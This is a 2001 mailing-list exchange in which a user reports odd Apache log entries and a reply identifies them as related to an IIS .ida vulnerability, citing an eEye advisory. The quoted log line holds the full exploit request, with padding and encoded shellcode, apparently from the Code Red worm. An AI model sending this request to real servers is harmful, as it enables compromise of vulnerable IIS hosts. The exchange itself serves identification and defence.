On Thu, 19 Jul 2001, Lars Trebing wrote:
My Apache has just got three strange requests from three different addresses:
63.149.209.133 - - [19/Jul/2001:18:55:47 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
IIRC those *.ida stuff is related to MS IIS and it reminds me of http://www.eeye.com/html/Research/Advisories/AD20010618.html. Please see http://www.newsbytes.com/news/01/168003.html, too. best regards, Rainer Link -- Rainer Link | SuSE - The Linux Experts link@suse.de | Developer of A Mail Virus Scanner (amavis.org) www.suse.de | Founder OpenAntiVirus Project (www.openantivirus.org)